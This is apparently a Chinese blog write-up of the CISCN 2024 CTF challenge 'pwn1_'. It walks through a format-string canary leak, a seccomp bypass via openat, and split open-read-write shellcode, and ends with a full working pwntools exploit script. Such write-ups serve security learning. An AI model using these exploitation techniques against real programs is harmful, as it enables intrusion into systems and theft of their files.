【PWN · ret2shellcode | sandbox-bypass | 格式化字符串】[2024CISCN · 华东北赛区]pwn1_

最新推荐文章于 2024-10-05 14:16:38 发布
最新推荐文章于 2024-10-05 14:16:38 发布
阅读量711 收藏 6
点赞数 13
分类专栏: 【PWN · Stack】 格式化字符串漏洞 【PWN · 高级栈相关】 文章标签: 数据库 前端 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/140226231
版权

一道栈+ret2shellcode+sandbox(seccomp)+格式化字符串的题目

前言

ret2shellcode,已经不是简单的放到栈上、ret这样一个简单的过程。套一层seccomp的沙箱,打ORW又遇到open受限等等,考虑的蛮多。过程中收获最多的可以说是汇编shellcode手动编写时的一些心得,还是跟着返璞归真师傅wp复现,再次感谢!

一、题目分析

没有给libc,栈可执行、存在Canary

开启了沙箱,禁用了open函数

IDA分析,可以明显看到栈溢出、格式化字符串,且均可以反复触发

 格式化字符串显然是用来泄露绕过canary的,栈溢出+NX没开又显然是用来ret2shellcode的

二、解题

先写个交互函数方便交互

def setName(name):
    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.sendlineafter(b'->set name',name)

def getName(flag=True):
    io.recvuntil(b'2: get name')
    if flag:
        io.sendline(b'2')
        io.recvuntil(b'->get name')
    else:
        io.sendline(b'123')

1.格式化字符串泄露Canary 

常规套路了,其实不必在此赘述

offset=8

然后脚本挂动态调试,看canary(泄露canary)、rbp(实质上是获取buf的地址,准备布局shellcode)是第几个参数的位置。

offset=8
payload1=(f'%{offset+0x50//8-1}$p--%{offset+0x50//8}$p').encode('utf-8')
setName(payload1)
input('Check')
getName()
io.recvuntil(b'0x')
canary=int(io.recv(16),16)
success(hex(canary))
io.recvuntil(b'--0x')
rbp=int(io.recv(12).decode('utf-8'),16)
buf=rbp-0x60
success(hex(rbp))
success(hex(buf))

 2.ret2shellcode

2.1 openat代替open

        由于开了沙箱,系统调用受限,orw的打法无疑,但是open被禁需要替换。查阅资料后发现openat可以一定程度上等价于open:

#open - flags
/*
O_ACCMODE       00000003
O_RDONLY        00000000
O_WRONLY        00000001
O_RDWR          00000002
O_CREAT         00000040
O_EXCL          00000080
O_NOCTTY        00000100
O_TRUNC         00000200
O_APPEND        00000400
O_NONBLOCK      00000800
O_DSYNC         00001000
FASYNC          00002000
O_NOFOLLOW      00020000
*/

 2.2 shellcode的布局 

之前已经知道能直接布局shellcode利用的buf空间为0x48,直接写长度大大超过

# shellcode 但是太大了
# shellcode=asm('''
#               mov rax,0x67616c662f2e; //./flag
#               push rax
#               ; //openat(-100,'./flag',O_RDONLY)
#               mov rdi,-100
#               mov rsi,rsp
#               xor rdx,rdx
#               mov rax,257
#               syscall
#               ; //read(3,target_address,0x50)
#               mov rdi,3
#               mov rsi,{}
#               mov rdx,0x50
#               xor rax,rax
#               syscall
#               ; //write(1,target_address,0x50)
#               mov rdi,1
#               mov rsi,{}
#               mov rdx,0x50
#               add eax,1
#               syscall
#               '''.format(xxx,xxx))

所以得想办法跨过canary、rbp、ret,构造shellcode

# shellcode分割开
shellcode=asm('''
              mov rax,0x67616c662f2e; //./flag
              push rax
              ; //openat(-100,'./flag',O_RDONLY)
              mov rdi,-100
              mov rsi,rsp
              xor rdx,rdx
              mov rax,257
              syscall
              ; //read(3,target_address,0x50)
              mov rdi,rax
              mov rsi,{}
              mov rdx,0x20
              xor rax,rax
              syscall
              mov rax,{}
              push rax
              ret
              '''.format(buf+0x80,buf+0x60))
shellcode=shellcode.ljust(0x48,b'\x00')
shellcode+=p64(canary)
shellcode+=p64(0)+p64(buf)
shellcode+=asm('''
              ; //write(1,target_address,0x50)
              mov rdi,1
              mov rsi,{}
              mov rdx,0x50
              mov eax,1
              syscall
'''.format(buf+0x80))

 比较妙的几个点是

  1. 通过 mov register,addr;push register;ret的方式实现了定向跳转
  2. 将flag远远写到后面的栈空间,避免对shellcode干扰

三、完整exp

from pwn import *

context(arch='amd64',log_level='debug')

io=process('./pwn1_')
gdb.attach(io);input()
def setName(name):
    io.recvuntil(b'2: get name')
    io.sendline(b'1')
    io.sendlineafter(b'->set name',name)

def getName(flag=True):
    io.recvuntil(b'2: get name')
    if flag:
        io.sendline(b'2')
        io.recvuntil(b'->get name')
    else:
        io.sendline(b'123')
    
offset=8
payload1=(f'%{offset+0x50//8-1}$p--%{offset+0x50//8}$p').encode('utf-8')
setName(payload1)
input('Check')
getName()
io.recvuntil(b'0x')
canary=int(io.recv(16),16)
success(hex(canary))
io.recvuntil(b'--0x')
rbp=int(io.recv(12).decode('utf-8'),16)
buf=rbp-0x60
success(hex(rbp))
success(hex(buf))

# shellcode 但是太大了
# shellcode=asm('''
#               mov rax,0x67616c662f2e; //./flag
#               push rax
#               ; //openat(-100,'./flag',O_RDONLY)
#               mov rdi,-100
#               mov rsi,rsp
#               xor rdx,rdx
#               mov rax,257
#               syscall
#               ; //read(3,target_address,0x50)
#               mov rdi,3
#               mov rsi,{}
#               mov rdx,0x50
#               xor rax,rax
#               syscall
#               ; //write(1,target_address,0x50)
#               mov rdi,1
#               mov rsi,{}
#               mov rdx,0x50
#               add eax,1
#               syscall
#               '''.format(xxx,xxx))

# shellcode分割开
shellcode=asm('''
              mov rax,0x67616c662f2e; //./flag
              push rax
              ; //openat(-100,'./flag',O_RDONLY)
              mov rdi,-100
              mov rsi,rsp
              xor rdx,rdx
              mov rax,257
              syscall
              ; //read(3,target_address,0x50)
              mov rdi,rax
              mov rsi,{}
              mov rdx,0x20
              xor rax,rax
              syscall
              mov rax,{}
              push rax
              ret
              '''.format(buf+0x80,buf+0x60))
shellcode=shellcode.ljust(0x48,b'\x00')
shellcode+=p64(canary)
shellcode+=p64(0)+p64(buf)
shellcode+=asm('''
              ; //write(1,target_address,0x50)
              mov rdi,1
              mov rsi,{}
              mov rdx,0x50
              mov eax,1
              syscall
'''.format(buf+0x80))


setName(shellcode)
input('check')
getName(False)
io.interactive()

总结

做的时候这不会那不会,做完之后写博客,感觉很多都没必要写。。。菜就多练。

Mr_Fmnwon
关注
专栏目录
pwn ret2shellcode
young‘s blog
02-08 1684
写在前面,记录一些小知识和一些文章 对于checksec后几个参数的具体研究: checksec及其包含的保护机制 (原博客图已经挂了,只能用简书的了) pwntools介绍(刚开始看不懂英文文档可以看这个): pwntools pwntools使用简介 文件执行时权限不够使用命令为: chmod +x start.sh 当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,...
Pwn学习-ret2shellcode
cdl10000的博客
11-04 396
此处有坑,由于环境不匹配,使用vmmap查看没有发现rwxp权限,实际该程序0x804a000 0x804b000 段具备执行权限。使用ida调试发现buf2函数地址0804A080正好位于可执行范围内,因此借用buf2函数来构造shellcode。本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。开始要做的工作都一样,查看程序保护措施,查看伪代码,查看敏感函数。没有发现敏感函数,因此需要查找能够执行的段,构造shell函数。再次计算偏移量,计算方法参考。
pwn——沙箱机制
djhtdjdywgjc的博客
11-20 2030
pwn沙箱
某大学信息安全竞赛——shellcode1 绕过strlen检查,绕过沙箱检查,执行orw shellcode拿到flag
fzucaicai的博客
05-14 1245
这是一道非常让人蛋疼的题目,之前我只听说过沙箱,但是并没有自己实际接触过沙箱这个保护机制,大概作用就是开了沙箱之后,会禁用掉某些函数,一旦我们使用了这个函数,比如我们在栈溢出构造ROP,或者写入shellcode执行时,只要含有这些函数,这个程序就会崩掉,这题目就开了沙箱。之前我有个疑问,这里明明没有exevce函数的引用,为什么我用pwntools工具写的 shellcode = asm(shellcraft.sh())或者网上抄来的execve(binsh)都不能打通呢??
PWN · ret2syscall | GoPwn】[2024CISCN · 赛区]go_note
Mr_Fmnwon的博客
07-02 886
可以说是做的第一道GoPwn。。。进度确实太慢;此外,除了学习了对GoPwn的调试、逆向,也关注了Gadget利用的一些trick,ret2syscall也又一次进阶式地复习,收获良多。本题受益良多,开心。
CTF PWN-攻防世界CGfsb格式化字符串漏洞
道阻且长,行则将至。
07-23 2232
距离 2021 年年底短暂接触学习 CTF PWN 相关知识(CTF PWN-攻防世界XCTF新手区WriteUp)已经是快 2 年前的事了,这期间就连攻防世界社区的站点都发生巨大变化了……为了学习终端领域底层漏洞的挖掘和利用技术,继续积累 PWN 相关知识。
BUUCTF|PWN-ciscn_2019_n_8-WP(格式化字符串漏洞)
l2645470582_的博客
01-11 2284
1.检查保护机制 (1)保护全开 2.运行看一下 3.我们用32位的IDA打开该文件 (1)Ctrl+F12查看关键字符串 (2)查看反编译代码 (3)条件满足var[13]!=0 &&var[13] ==17,才能拿到权限 (4)var[13]位置在第十四个上 payload构造 第一种: payload = b'a'*13*4 + p32(17) #qword/IDA在32位里面是4个字节,在64位是/8个字节 ...
PWN · ret2shellcode | “jmp esp“】[i春秋]ret2shellcode
Mr_Fmnwon的博客
10-04 885
回顾ret2shellcode发现还有很多基础的技巧没有掌握。本题算是一个经典地、通过jmp esp将栈上的shellcode进行执行的题目。一、题目重述通过本例,掌握一个基础而常见的技巧:控制执行流到栈上指定位置开始执行。核心是利用了jmp esp 指令。
PWN · ret2libc | protobuf】[2024CISCN · 赛区]protoverflow
Mr_Fmnwon的博客
06-27 879
第一次遇到protobuf,如果没有了解过,是显然做不出来的。此次复现,也算是点亮了一个技能点Protocol Buffers,是Google公司开发的一种数据描述语言,类似于XML能够将结构化数据序列化,可用于数据存储、通信协议等方面。常用于跨平台和异构系统中进行RPC调用,序列化和反序列化效率高且体积比XML和JSON小得多,非常适合网络传输。为了能够和程序进行交互,我们需要先逆向分析得到Protobuf结构体,然后构造序列化后的Protobuf与程序进行交互。具体不如参考PWN佬。
PWN-非栈上格式化字符串漏洞
最新发布
10-06
PWN-非栈上格式化字符串漏洞
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwnshellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
跟着CTF-wiki学pwn——ret2shellcode
qq_42882717的博客
07-01 854
CTF-wiki的注解:ret2shellcode
实用SQL小总结
UntifA的博客
09-29 1486
SQL记录
PostgreSQL的WAL日志优化及验证
Java_fenxiang的博客
10-05 470
在应用负载不变的情况下可以通过如下方法进行WAL优化登录后复制 1) 延长checkpoint时间间隔 FPI产生于checkpoint之后第一次变脏的page,在下次checkpoint到来之前,已经输出过FPI的page是不在需要再次输出FPI。因此checkpoint时间间隔越长,FPI产生的频度会越低。增大ch...
MySQL之复合查询与内外连接
zdlynj的博客
09-30 1303
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
World of Warcraft [CLASSIC][80][Grandel] Call to Arms: Victory in Wintergrasp
qq 117791303
10-02 328
Wintergrasp 冬拥湖 120 VS 120
Redis事务
zhzjn的博客
09-30 400
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
pwn格式化字符串漏洞
08-30
pwn中的格式化字符串漏洞是指通过向程序输入格式化字符串,然后利用程序内部的输出函数来读取或修改内存中的数据。这种漏洞会导致程序的安全性受到威胁,攻击者可以利用该漏洞执行任意代码或者获取敏感信息。 格式化字符串漏洞通常发生在使用格式化输出函数(如printf)时,输入的格式字符串中包含了未经验证的用户输入。攻击者可以通过修改格式字符串中的特殊格式标识符来读取或修改内存中的数据。 为了防止格式化字符串漏洞,开发者应该对用户输入进行严格的验证和过滤,确保输入的格式字符串没有恶意的内容。此外,可以使用安全的格式化输出函数(如snprintf)来替代不安全的输出函数,以提高代码的安全性。 如果你需要更详细的信息,请告诉我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值